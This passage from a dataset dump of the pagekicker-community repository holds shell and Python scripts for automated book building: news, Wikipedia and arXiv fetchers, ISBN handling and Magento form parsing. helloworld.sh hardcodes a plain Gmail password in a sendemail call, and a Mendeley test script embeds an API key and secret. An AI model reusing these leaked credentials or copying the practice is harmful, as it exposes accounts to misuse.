/usr/share/fonts/truetype/ttf-dejavu fonts\n\nOptional:\n\nxmlstarlet # only needed if you are parsing xml input\nt command line twitter client with Twitter API key # any other twitter search client can be plugged in\n\nStorefronts:\n\nThe Magento storefront requires Magento Community 1.9.2.4.1 (free) plus several commercial extensions that have been customized by PageKicker. Distribution via the PageKicker store and private label hosted solutions are available via PageKicker Enterprise.\n" }, { "alpha_fraction": 0.669966995716095, "alphanum_fraction": 0.6716171503067017, "avg_line_length": 45.61538314819336, "blob_id": "d339a2307efe26fd9d2ccab880701c4710135fc1", "content_id": "c0f7309dd9eb2e462e1fa201ecfa00dee30cc2f5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 606, "license_type": "permissive", "max_line_length": 95, "num_lines": 13, "path": "/scripts/includes/googler-news.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo \"# News Snippets\" > $TMPDIR$uuid/googler-news.md\necho \"\" >> $TMPDIR$uuid/googler-news.md\necho \"search carried out at $(date -u)\" >> $TMPDIR$uuid/googler-news.md\necho \"\" >> $TMPDIR$uuid/googler-news.md\nwhile IFS= read -r seed; do\n echo \"running googler -n on $seed\" \n echo \"**\"$seed\"**\" >> $TMPDIR$uuid/googler-news.md\n echo \"\" >> $TMPDIR$uuid/googler-news.md\n \"$scriptpath\"lib/googler/googler -C --noprompt --news \"$seed\" >> $TMPDIR$uuid/googler-news.md\n echo \"\" >> $TMPDIR$uuid/googler-news.md\n echo \"\" >> $TMPDIR$uuid/googler-news.md\n sleep 2\ndone < \"$TMPDIR\"$uuid\"/seeds/filtered.pagehits\"\n" }, { "alpha_fraction": 0.6888412237167358, "alphanum_fraction": 0.696351945400238, "avg_line_length": 28.125, "blob_id": "6b6557168b09f5bf47fee22606be8e66bf8e24a1", "content_id": "ca3823832a91adb1bab8d8184c2b5970c604fa67", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 932, "license_type": "permissive", "max_line_length": 153, "num_lines": 32, "path": "/scripts/bin/screen-human-error.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n. ../conf/config.txt\n\necho \"beginning to screen out naughty and duplicate seeds\" >> $sfb_log\n\nwhile read -r line; do \n\nif grep -qw \"$line\" \"seeds/human-error.txt\" ; then\n\n\tPK_ERR_CODE=\"human_error1\"\n\techo \"looks like customer forgot to provide new phrases\" | tee --append $sfb_log\n\n\tsendemail -t \"$customer_email\" \\\n\t\t-m \"This book build has been cancelled because it looks like you forgot to replace the dummy keyword phrases with real keywords\" \\\n\t\t-u \"Build cancelled because dummy keyword phrases\" \\\n\t\t-f \"$GMAIL_ID\" \\\n\t\t-cc \"$GMAIL_ID\" \\\n\t\t-xu \"$GMAIL_ID\" \\\n\t\t-xp \"$GMAIL_PASSWORD\" \\\n\t\t-s smtp.gmail.com:587 \\\n\t\t-o tls=yes \n\t\techo \"exiting dummy\" ; exit 0\nelse\n\techo \"congratulations $line is not a dummy phrase, and you are not a dummy\"\nfi\n\necho \"I checked your seed phrasesto be sure you filled out the form correctly, and you did. Good job, fellow sentient!\" >> $TMPDIR$uuid/seeds/process.md\n\ndone <$1\n\nexit 0\n" }, { "alpha_fraction": 0.6893576383590698, "alphanum_fraction": 0.6927133202552795, "avg_line_length": 32.0476188659668, "blob_id": "f8382df343e0d3f7e286c1aed6992937b55e5020", "content_id": "c7ce9f1804d9c8539a6e0bc50645251caa28e276", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2086, "license_type": "permissive", "max_line_length": 96, "num_lines": 63, "path": "/scripts/bin/mwclient_wiki_seeds_2_pages.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- codinwig: utf-8 -*-\n\"\"\"\nMediaWiki seed expander\nFred Zimmerman\nwfzimmerman#gmail.com\n\nexpands search seeds to exact MediaWiki page title\n\nconverted to use mwclient library and enhanced to allow pointing at any \nMediaWiki endpoint URL\n\nthree variables specify the endpoint URL\n--mediawiki_api_url \"en.wikipedia.org\" (no http)\n--url_prefix \"http\" or \"https\"\n--wikipath \"/w/\" is default -- path to API endpoint configured on Mediawiki server \n\n\"\"\"\n\nimport logging\nimport argparse\nimport mwclient\n\n\nlogging.basicConfig(level=logging.WARNING)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--infile\", help = \"seed file\", default = 'test')\nparser.add_argument(\"--lang\", help=\"wiki language bigram\", default = 'en')\nparser.add_argument(\"--request_type\", help=\"request type\", default = 'sum')\nparser.add_argument(\"--outfile\", help = \"path to outfile\", default = 'outfile')\nparser.add_argument(\"--summary\", help = \"true or false\", action = \"store_false\")\nparser.add_argument(\"--logging\", help = \"true or false\", action = \"store_true\")\nparser.add_argument(\"--mediawiki_api_url\", help = \"true or false\", default = 'en.wikipedia.org')\nparser.add_argument(\"--url_prefix\", help = \"default wiki ssl value is https\", default = 'https')\nparser.add_argument(\"--wikipath\", help = \"mediawiki default is /w/api.php\", default = '/w/')\n\nargs = parser.parse_args()\n\ninput_file = args.infile\noutput_file = args.outfile\nlang = args.lang\nsummary = args.summary\nlogging = args.logging\nmediawiki_api_url = args.mediawiki_api_url\nurl_prefix = args.url_prefix\nwiki_tuple = (url_prefix, mediawiki_api_url)\nprint_wiki_tuple= \"wiki_tuple value is{}\".format(wiki_tuple)\nprint(print_wiki_tuple)\n\nwikipath = args.wikipath\nsite = mwclient.Site(wiki_tuple, path=wikipath)\nprint(site)\nfile = open(input_file, 'r').read().splitlines()\n#file2 = open(output_file, 'w')\n\nwith open(output_file, 'a+') as f2:\n with open(input_file, 'r') as f1:\n for line in f1:\n print('seed is ' + line)\n hits = site.search(line)\n print(*hits, file=open(output_file, \"w+\"))\n f1.close()\n f2.close()\n \n" }, { "alpha_fraction": 0.6481131911277771, "alphanum_fraction": 0.6566037535667419, "avg_line_length": 29.586538314819336, "blob_id": "ccd6a4158467b8ce69d1e48eb9961c48e7214cdd", "content_id": "bd5f673fe8bce367ec748c4606b4ec00bfc0b26f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3180, "license_type": "permissive", "max_line_length": 96, "num_lines": 104, "path": "/scripts/bin/mwclient_wikifetcher_adds_metadata.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nwapackpedia text fetcher\nFred Zimmerman\nwfzimmerman#gmail.com\n\nconverted to use mwclient library and enhanced to allow pointing at any \nMediaWiki endpoint URL\n\nthree variables specify the endpoint URL\n--mediawiki_api_url \"en.wikipedia.org\" (no http)\n--url_prefix \"http\" or \"https\"\n--wikipath \"/w/\" is default -- path to API endpoint configured on Mediawiki server \n\nmwclient_seeds_to_pages.py is responsible for providing \nexact page names to infile page names must be exact, i.e. are case \nand punctuation sensitive\n\n\"\"\"\n\nimport logging\nimport argparse\nimport mwclient\n\n\nlogging.basicConfig(level=logging.WARNING)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--infile\", help = \"seed file\", default = 'test')\nparser.add_argument(\"--lang\", help=\"wiki language bigram\", default = 'en')\nparser.add_argument(\"--request_type\", help=\"request type\", default = 'sum')\nparser.add_argument(\"--outfile\", help = \"path to outfile\", default = 'outfile')\nparser.add_argument(\"--summary\", help = \"true or false\", action = \"store_false\")\nparser.add_argument(\"--logging\", help = \"true or false\", action = \"store_true\")\nparser.add_argument(\"--mediawiki_api_url\", help = \"true or false\", default = 'en.wikipedia.org')\nparser.add_argument(\"--url_prefix\", help = \"default wiki ssl value is https\", default = 'https')\nparser.add_argument(\"--wikipath\", help = \"mediawiki default is /w/api.php\", default = '/w/')\nparser.add_argument(\"--cats_file\", help = \"path to outfile\", default = 'cats')\nparser.add_argument(\"--extlinks_file\", help = \"path to outfile\", default = 'extlinks')\n\nargs = parser.parse_args()\n\ninput_file = args.infile\noutput_file = args.outfile\ncats_file = args.cats_file\nextlinks_file = args.extlinks_file\nlang = args.lang\nsummary = args.summary\nlogging = args.logging\nmediawiki_api_url = args.mediawiki_api_url\nurl_prefix = args.url_prefix\n\n\nwikipath = args.wikipath\nsite = mwclient.Site('en.wikipedia.org', scheme=\"https\")\nprint(site)\nfile1 = open(input_file, 'r').read().splitlines()\nfile2 = open(output_file, 'w')\nfile3 = open(cats_file, 'w')\nfile4 = open(extlinks_file, 'a+')\nfor line in file1:\n try:\n print('seed is ' + line)\n page = site.pages[line]\n text = page.text()\n #print('\\n'+ 'categories are' + '\\n')\n #print(*cats, sep='\\n')\n cats = list(page.categories())\n print(cats)\n extlinks = list(page.extlinks())\n print('\\n'+ 'external links are '+ '\\n')\n print(extlinks)\n print(extlinks, sep='\\n', file=open(extlinks_file, \"w\"))\n backlinks = page.backlinks()\n print(*backlinks)\n images = list(page.images())\n print(images)\n except:\n mwclient.errors.InvalidPageTitle\n continue\n file2.write('\\n')\n file2.write('\\n')\n file2.write('# ' )\n file2.write(line)\n file2.write('\\n')\n file2.write(text)\n \n file3.write('\\n')\n file3.write('\\n')\n file3.write('# ' )\n file3.write(line)\n file3.write('\\n')\n file3.write(str(cats))\n \n file4.write('\\n')\n file4.write('\\n')\n file4.write('# ' )\n file4.write(line)\n file4.write('\\n')\n file4.write(str(extlinks))\n \nfile2.close\nfile3.close\nfile4.close" }, { "alpha_fraction": 0.5712476372718811, "alphanum_fraction": 0.5902469754219055, "avg_line_length": 25.762712478637695, "blob_id": "85c9ce898a08817c7c75479721592c4350bd330c", "content_id": "5164eb08f239c47bffcd1eb5b5dfcd85733f2c31", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1579, "license_type": "permissive", "max_line_length": 142, "num_lines": 59, "path": "/scripts_python_3/bin/ArXivFetcher.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python\n###################################################\n#ArXivFetcher.py\n#Inputs:\n#1)seeds for calls (can be multiples, contained in one string) \n#2) a uuid \n#3) number of results\n#Outputs:\n#1) \n#Attributes to add:\n#1)accept multiple seed terms\n# \n#######\n\n\nimport os, sys, codecs, urllib.request, urllib.parse, urllib.error\ntry:\n import xml.etree.cElementTree as ET\nexcept ImportError:\n import xml.etree.ElementTree as ET\n#=================================================\ndef main():\n\tseed = str(sys.argv[1])\n\tuuid_path = str(sys.argv[2])\n\tresults_num = sys.argv[3]\n\tos.chdir(uuid_path)\n\ttitle = ''\n\tpdf = ''\n\turl = 'http://export.arxiv.org/api/query?search_query=all:'+seed+'&start=0&max_results='+results_num+'&sortBy=relevance&sortOrder=descending'\n\tdata = urllib.request.urlopen(url).read()\n\ttree = ET.fromstring(data)\n\t\n\ttitle_list = []\n\tpdf_list = []\n\titernum = 0;\n\ttitlenum = 0;\n\t\t\n\tfor elem in tree.iterfind('.//{http://www.w3.org/2005/Atom}entry'):\n\t\t\tfor subelem in elem.iterfind('.//{http://www.w3.org/2005/Atom}title'): \n\t\t\t\ttitle = subelem.text\n\t\t\t\ttitle_list.append(title)\n\tfor elem in tree.iterfind('.//{http://www.w3.org/2005/Atom}link[@type=\"application/pdf\"]'):\n\t\tpdf = elem.attrib.get('href')\n\t\tpdf_list.append(pdf) \n\n\n\t#pdf_url = tree[7][8].attrib.get('href')\n\t#title = tree[7][3].text\n\tif title != '':\n\t\tfor i in range(len(title_list)):\n\t\t\tprint((title_list[i]))\n\t\t\tprint((pdf_list[i]))\n\telse:\n\t\tprint('No results found.')\n\t#print data\n \n#=================================================\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.7603305578231812, "alphanum_fraction": 0.7630854249000549, "avg_line_length": 39.22222137451172, "blob_id": "99ff932a4d0b27693c2b019d2cd1c5f11c8aaa33", "content_id": "153b69c1df49ccff6138d9b64ecd8606276d8077", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 363, "license_type": "permissive", "max_line_length": 78, "num_lines": 9, "path": "/test/add_bibliography.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# adds book titles to imprint & robot bibliography files and \n# makes sure that the titles have been properly added\n\n# checks line count of imprint & robot bibliography before running test build\n# runs test build with specified imprint & robot for unique new title\n# checks that new line count = old line count + 1\n# runs test build with specified \n" }, { "alpha_fraction": 0.5658536553382874, "alphanum_fraction": 0.5853658318519592, "avg_line_length": 17.636363983154297, "blob_id": "d5c7e77e97cc85619f0f4bc3797a05839fd85f26", "content_id": "a49e751dc7c8df7a04492bc9add24d55f01c0527", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 205, "license_type": "permissive", "max_line_length": 32, "num_lines": 11, "path": "/scripts/helloworld.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\necho \"hello world\" \nsendemail -t \"[email protected]\" \\\n\t-u \"hello world\" \\\n\t-m \"hello wordl from Magento\" \\\n\t-f [email protected] \\\n\t-xu [email protected] \\\n\t-xp \"f1r3comb\" \\\n\t-s smtp.gmail.com:587 \\\n\t-o tls=yes \nexit 0\n" }, { "alpha_fraction": 0.42093902826309204, "alphanum_fraction": 0.4543982744216919, "avg_line_length": 24.369863510131836, "blob_id": "805b5f4f47efdcbda4fbcd2bd46dade8291e4b14", "content_id": "1086b7cfec59983da73ffcae78c198da9226bde6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1853, "license_type": "permissive", "max_line_length": 69, "num_lines": 73, "path": "/scripts/bin/float_fx.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\n# Floating point number functions.\n\n#####################################################################\n# Default scale used by float functions.\n\nfloat_scale=2\n\n\n#####################################################################\n# Evaluate a floating point number expression.\n\nfunction float_eval()\n{\n local stat=0\n local result=0.0\n if [[ $# -gt 0 ]]; then\n result=$(echo \"scale=$float_scale; $*\" | bc -q 2>/dev/null)\n stat=$?\n if [[ $stat -eq 0 && -z \"$result\" ]]; then stat=1; fi\n fi\n echo $result\n return $stat\n}\n\n\n#####################################################################\n# Evaluate a floating point number conditional expression.\n\nfunction float_cond()\n{\n local cond=0\n if [[ $# -gt 0 ]]; then\n cond=$(echo \"$*\" | bc -q 2>/dev/null)\n if [[ -z \"$cond\" ]]; then cond=0; fi\n if [[ \"$cond\" != 0 && \"$cond\" != 1 ]]; then cond=0; fi\n fi\n local stat=$((cond == 0))\n return $stat\n}\n\n\n# Test code if invoked directly.\nif [[ $(basename $0 .sh) == 'float' ]]; then\n # Use command line arguments if there are any.\n if [[ $# -gt 0 ]]; then\n echo $(float_eval $*)\n else\n # Turn off pathname expansion so * doesn't get expanded\n set -f\n e=\"12.5 / 3.2\"\n echo $e is $(float_eval \"$e\")\n e=\"100.4 / 4.2 + 3.2 * 6.5\"\n echo $e is $(float_eval \"$e\")\n if float_cond '10.0 > 9.3'; then\n echo \"10.0 is greater than 9.3\"\n fi\n if float_cond '10.0 < 9.3'; then\n echo \"Oops\"\n else\n echo \"10.0 is not less than 9.3\"\n fi\n a=12.0\n b=3.0\n c=$(float_eval \"$a / $b\")\n echo \"$a / $b\" is $c\n set +f\n fi\nfi\n\n# vim: tabstop=4: shiftwidth=4: noexpandtab:\n# kate: tab-width 4; indent-width 4; replace-tabs false;\n\n" }, { "alpha_fraction": 0.7771610021591187, "alphanum_fraction": 0.7819191217422485, "avg_line_length": 77.75, "blob_id": "0fb3d5a392e1ecb2502ef8b681b7ec4eb6b19a8e", "content_id": "831e64a2aee334a8bcd152dc5d6c4ebf29e03d28", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1261, "license_type": "permissive", "max_line_length": 228, "num_lines": 16, "path": "/docs/doc/getting-started.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "GETTING STARTED\n\n1. Make sure all dependencies are installed.\n2. Copy conf/config_template.txt to conf/config.txt and customize all values.\n3. Run scripts/bin/setup.sh to create various directories that are needed.\n4. Make sure that all API keys are stored in scripts/install/api-manager.sh. The Wikipedia key currently resides in scripts/. This should be changed in future.\n5. Modify the file scripts/seeds/current-seed to include several search terms that correspond to Wikipedia article titles.\n6. cd to $scriptpath and run the following test command:\n\n bin/create-catalog-entry.sh --builder \"yes\" --booktitle \"Test\" --yourname \"Fred\" --jobprofilename \"Default\" --sample_tweets \"no\" --import \"no\" \n\nIt should create epub, mobi, and docx files and deposit them in $TMPDIR/pagekicker/$uuid. that same folder contains all the interim work products.\n\nYou can run against any collection of seeds by creating a text file with one seed per line and adding the parameter --seedfile \"/path/to/seedfile\" to the command line above.\n\nTo begin contributing, look at the wiki Architecture and Roadmap docs, then look at issues list and pick something easy. There are a number of fairly straightforward modifications that need to be made to bash or Python scripts. \n" }, { "alpha_fraction": 0.6273320913314819, "alphanum_fraction": 0.6387593150138855, "avg_line_length": 28.349315643310547, "blob_id": "956a7ef335852da17cdbd696f03333001dad4581", "content_id": "ed9a334b149fb82f9c5b098631546a827f009c4e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4288, "license_type": "permissive", "max_line_length": 106, "num_lines": 146, "path": "/scripts/bin/stripped_down_test.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nMendeley Open API Example Client\n\nCopyright (c) 2010, Mendeley Ltd. <[email protected]>\n\nPermission to use, copy, modify, and/or distribute this software for any\npurpose with or without fee is hereby granted, provided that the above\ncopyright notice and this permission notice appear in all copies.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\nWITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\nMERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\nANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\nWHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\nACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\nOR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\nFor details of the Mendeley Open API see http://dev.mendeley.com/\n\nExample usage:\n\npython test.py\n\n\"\"\"\n\nfrom pprint import pprint\nfrom mendeley_client import MendeleyClient\nimport json\n# import os\nimport string\n# import sys\n\n\nmendeley = MendeleyClient('13a47f20711f5d5ffe8e8f4db1df1daa04f8bd9b6', '394d64a2907f23c7f6ea5d94fb386865')\n\ntry:\n mendeley.load_keys()\nexcept IOError:\n mendeley.get_required_keys()\n mendeley.save_keys()\n\nclass MPub(object):\n \n def __init__(self, uuid, title, abstract, authors, keywords, publication, tags, url, year):\n self.uuid = uuid\n self.title = title\n self.abstract = abstract\n self.authors = authors\n self.keywords = keywords\n self.title = title\n self.tags = tags\n self.url = url\n self.year = year\n \n def __str__(self):\n return \"(Mendeley Paper Object: %s)\" % self.uuid\n \n def __repr__(self):\n return \"(Mendeley Paper Object: %s)\" % self.uuid\n\n\n \n def __ne__(self, other):\n return not self.__eq__(other) \n\n\nprint(\"\"\"\n\n-----------------------------------------------------\nList folders\n-----------------------------------------------------\"\"\")\nfolders = mendeley.folders()\npprint(folders)\n\nfolderid = input('Enter folder id: ')\npprint(folderid)\n\nresponse = mendeley.create_folder(folder=json.dumps({'name': 'Recent Docs to Review', 'parent':folderid}))\n# pprint(response)\nprint(\"Created Review Child Folder\")\nreviewchildfolderid = response['folder_id']\n\ndocs = mendeley.folder_documents(folderid)\npprint(docs)\nprint(\"Retrieving documents from selected folder\")\npub_list = []\npprint(pub_list)\n\n# from wikiradar.py\n\n# Dictionary mapping uuid's to a dictionary with keys: authors, title, year, count\nrelated_doc_dict = dict()\n\ndetails = mendeley.document_details(documents['document_ids'][0])\n\nprint(\"Looking up suggestions for related docs.\")\nprint(\"\")\nfor pub_item in pub_list:\n pprint(pub_item)\n related_docs = mendeley.related(pub_item.uuid, items=10)\n for related_doc in related_docs['documents']:\n uuid = related_doc['uuid']\n rel_doc_info = related_doc_dict.get(uuid, None)\n if rel_doc_info:\n rel_doc_info['count'] += 1\n else:\n rel_doc_info = dict()\n rel_doc_info['authors'] = related_doc['authors']\n rel_doc_info['title'] = related_doc['title']\n rel_doc_info['year'] = related_doc['year']\n rel_doc_info['count'] = 1\n related_doc_dict[uuid] = rel_doc_info\n\nrelated_list = sorted(list(related_doc_dict.values()), key = lambda doc:doc['count'])\nrelated_list.reverse()\n\nprint(\"Related Papers\")\nprint(\"--------------\")\ncount = 0\nfor pub_item in pub_list:\n print(\"%d: %s - %d\" % ((count+1), pub_item.title, pub_item.year))\n count += 1\nprint(\"\")\n\nprint(\"Found %d related papers to suggest.\" % len(related_list))\n\nprint(\"Suggested Related Papers\")\nprint(\"------------------------\")\ncount = 0\nfor item in related_list:\n year = float(item['year'])\n score = float(item['count'])/len(pub_list)\n #if (count < 20):\n #get recent docs instead\n if (year > 2009):\n print(\"%d: %s - %d | Score: %f\" % ((count + 1), item['title'], item['year'], score))\n count += 1\n score = float(item['count'])/len(related_list)\n if (score >= 0.5) and (count < 10):\n print(\"%d: %s - %d | Score: %f\" % ((count+1), item['title'], item['year'], score))\n count += 1\nprint(\"\")\n\n# then upload suggested drelated papersto for Review folder\n\n\n\n" }, { "alpha_fraction": 0.6952646374702454, "alphanum_fraction": 0.7030640840530396, "avg_line_length": 31.01785659790039, "blob_id": "66cee03562c51ebd119e511ff113f1df60beaeac", "content_id": "c33826ea6db2e7f62f042d8ce185f6d42f51ff97", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1795, "license_type": "permissive", "max_line_length": 119, "num_lines": 56, "path": "/scripts/includes/prepare_4_coresource.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\nISBNowner=\"8\"\n\nif [ \"$ebookISBN\" = \"no\" ] ; then\n\n\techo \"ISBN not assigned automatically, looking for one that is manually entered\" | tee --append $sfb_log\n\n\nelse\n\techo \"user has asked for ISBN to be assigned automatically\" | tee --append $sfb_log\n\nfi\n\necho \"ISBNowner is \" $ISBNowner\n\ncase \"$ISBNowner\" in\n\n\n0)\n\techo \"no ISBN assigned\" | tee --append $sfb_log\n\n;;\n\n8) \n\n\tISBN=`head -1 ISBNs/customer_id_8/nimble-ISBNs-available.txt`\n\techo \"ISBN \"$ISBN\" was assigned to SKU \"$sku \"with covertitle \"$covertitle | tee --append $sfb_log $ISBN_log\n\techo -n $ISBN >> $sfb_log ISBNs/customer_id_8/nimble-ISBNs-used.csv\n\techo -n \",\" >> ISBNs/customer_id_8/nimble-ISBNs-used.csv\n\techo -n \"$title\" >> ISBNs/customer_id_8/nimble-ISBNs-used.csv\n\techo -n \",\">> ISBNs/customer_id_8/nimble-ISBNs-used.csv\n\techo -n \"$author\"| tee --append ISBNs/customer_id_8/nimble-ISBNs-used.csv\n\tISBNs_remaining=`wc -l \"ISBNs/customer_id_8/nimble-ISBNs-available.txt\"`\n\techo \"there are \"$ISBNs_remaining\" in nimble-ISBNs-available.txt\" | tee --append $sfb_log\n\tsed -i '1,1d' ISBNs/customer_id_8/nimble-ISBNs-available.txt\n\n\t# fix up epub for submission to CoreSource\n\n\tcp $mediatargetpath$uuid/$sku\".epub\" $mediatargetpath$uuid\"/\"$ISBN\"_working.epub\"\n\t# epub-fix --epubcheck $mediatargetpath$uuid\"/\"$ISBN\"_working.epub\"\n\tcp $mediatargetpath$uuid\"/\"$ISBN\"_working.epub\" $SFB_MAGENTO_HOME\"media/lsi-import/\"$ISBN\"_EPUB.epub\"\n\n\t# echo \"created epubfixed version of\" $sku.\"epub\" at $mediatargetpath$uuid\"/\"$ISBN\"_EPUB.epub\" | tee --append $sfb_log\n\n\tconvert images/$uuid/$sku\".png\" $SFB_MAGENTO_HOME\"media/lsi-import/\"$ISBN\"_FC.jpg\"\n\n\techo \"converted cover png to jpg for CoreSource\" | tee --append $sfb_log\n\n;;\n\n*)\n\n\techo \"no ISBNs associated with this value of ISBN_owner\" $ISBN_owner | tee --append $sfb_log\n\t\n;;\n\nesac\n\n" }, { "alpha_fraction": 0.5630252361297607, "alphanum_fraction": 0.6134454011917114, "avg_line_length": 22.799999237060547, "blob_id": "88293809e367c40ea67938feaf836384569974bd", "content_id": "ae72c114e396d60895b90979b472572b5d6b9e8a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 119, "license_type": "permissive", "max_line_length": 58, "num_lines": 5, "path": "/test/decimator-test.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# usage decimator.sh \"$1\" \"$2\"\necho $1\necho $2\nbin/decimator.sh --pdfinfile \"$1\" --outdir scr --tldr \"$2\"\n" }, { "alpha_fraction": 0.690666675567627, "alphanum_fraction": 0.6996490955352783, "avg_line_length": 36.29842758178711, "blob_id": "152a121aa7345ed084df7f35121f560f46192a67", "content_id": "34513fe0443d21be9900f786572c4e2397fcbbfd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 7125, "license_type": "permissive", "max_line_length": 136, "num_lines": 191, "path": "/scripts/xform.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": " #!/bin/bash\n\n# file path for file attachments must be hard coded\n# to match the magento file structure & specifically webform field #\n\n# requires inotify to alert that xml file has been created by the Magento webforms plugin and deposited in the correct directory\n# which is set by incrontab command for the bitnami user\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. /home/$(whoami)/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\nstarttime=$(( `date +%s` ))\ndatenow=$(date -R)\n\n# parse the command-line very stupidly\n\nxmldirectoryname=$1\nxmlbasefile=$2\necho \"parameter 1 is\" $1\necho \"parameter 2 is\" $2\nxmlfilename=$xmldirectoryname/$xmlbasefile\n\necho \"loaded\" $environment \"config file at \" $datenow\n\nuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\nmkdir -p -m 755 $logdir$uuid\nxform_log=$logdir$uuid/\"xform_log\"\necho \"XXXXXXXXXX\" | tee --append $xform_log\necho \"xmlfilename provided by webforms is\" $xmlfilename | tee --append $xform_log\necho \"xform_log is\" $xform_log | tee --append $xform_log\necho \"started xform at \" $starttime \" details in $xform_log\" | tee --append $xform_log\n\necho \"WEBFORMSXML_HOME is $WEBFORMSXML_HOME\"\n\n\nsku=`tail -1 < \"$LOCAL_DATA\"\"SKUs/sku_list\"`\necho \"sku\" $sku | tee --append $xform_log\n\necho \"$0 version in $environment\" \"is\" $SFB_VERSION | tee --append $xform_log\n\ncd $scriptpath\necho \"scriptpath is\" $scriptpath\n\n# echo \"PATH is\" $PATH | tee --append $xform_log\n\n# use xmlstarlet to extract variable values that are common to all Magento forms\nsubmissionid=$(xmlstarlet sel -t -v \"/item/id\" \"$xmlfilename\")\nwebform_id=$(xmlstarlet sel -t -v \"/item/webform_id\" \"$xmlfilename\")\ncustomerid=$(xmlstarlet sel -t -v \"/item/customer_id\" \"$xmlfilename\")\ncustomer_name=$(xmlstarlet sel -t -v \"/item/customer_name\" \"$xmlfilename\")\ncustomer_email=$(xmlstarlet sel -t -v \"/item/customer_email\" \"$xmlfilename\")\n\n\n# echo them back so I can see that they are the correct variable values\n\necho \"webform_id was\" $webform_id | tee --append $xform_log\necho \"submissionid was\" $submissionid | tee --append $xform_log\necho \"customerid was \" $customerid | tee --append $xform_log\necho \"customername was\" $customer_name | tee --append $xform_log\necho \"customeremail was\" $customer_email | tee --append $xform_log $sfb_log\n\n# begin case loop that checks to see what form has been submitted and acts accordingly\n\ncase $webform_id in\n\n4)\n\n# echo \"found Magento form submission id 4, executing ccc\"\n\n$scriptpath\"bin/create-catalog-entry.sh\" --xmlfilename \"$xmlbasefile\" --passuuid \"$uuid\" --format \"xml\" --builder \"yes\" --summary \"both\"\n\necho \"launched $0 from\" $environment\n;;\n\n21)\n\necho \"running create your robot form 21\" | tee --append $xform_log\n$scriptpath\"bin/robot-builder.sh\" --xmldirectoryname \"$xmldirectoryname\" --xmlbasefile \"$xmlbasefile\" --passuuid \"$uuid\"\n\n;;\n\n23)\n\n# echo \"running dat.sh with xml file from webform\"\n$scriptpath\"bin/dat.sh\" --xmldirectoryname \"$xmldirectoryname\" --xmlbasefile \"$xmlbasefile\" --passuuid \"$uuid\"\n;;\n\n\n\n24)\n\n echo \"Automatically Build the Cover for Your Printed Book\" | tee --append $xform_log\n covercolor=$(xmlstarlet sel -t -v \"/item/covercolor\" \"$xmlfilename\")\n coverfontcolor=$(xmlstarlet sel -t -v \"/item/coverfontcolor\" \"$xmlfilename\")\n coverfont=$(xmlstarlet sel -t -v 